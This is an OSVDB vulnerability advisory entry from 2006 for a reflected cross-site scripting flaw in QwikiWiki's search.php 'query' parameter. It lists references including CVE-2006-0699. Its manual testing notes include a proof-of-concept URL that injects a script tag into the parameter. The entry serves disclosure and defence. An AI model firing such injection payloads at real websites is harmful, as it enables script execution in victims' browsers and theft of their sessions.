QwikiWiki search.php query Variable XSS

2006-02-13T05:02:38
ID OSVDB:23125
Type osvdb
Reporter OSVDB
Modified 2006-02-13T05:02:38

Description

Manual Testing Notes

http://[target]/search.php?debug=&help=&query=<script>alert("XSS Vulnerability")</script>

References:

Vendor URL: http://www.qwikiwiki.com/ Secunia Advisory ID:18814 Other Advisory URL: http://insecurity.altervista.org/index.php?m=02&y=06&entry=entry060213-221217 ISS X-Force ID: 24669 FrSIRT Advisory: ADV-2006-0562 CVE-2006-0699 Bugtraq ID: 16638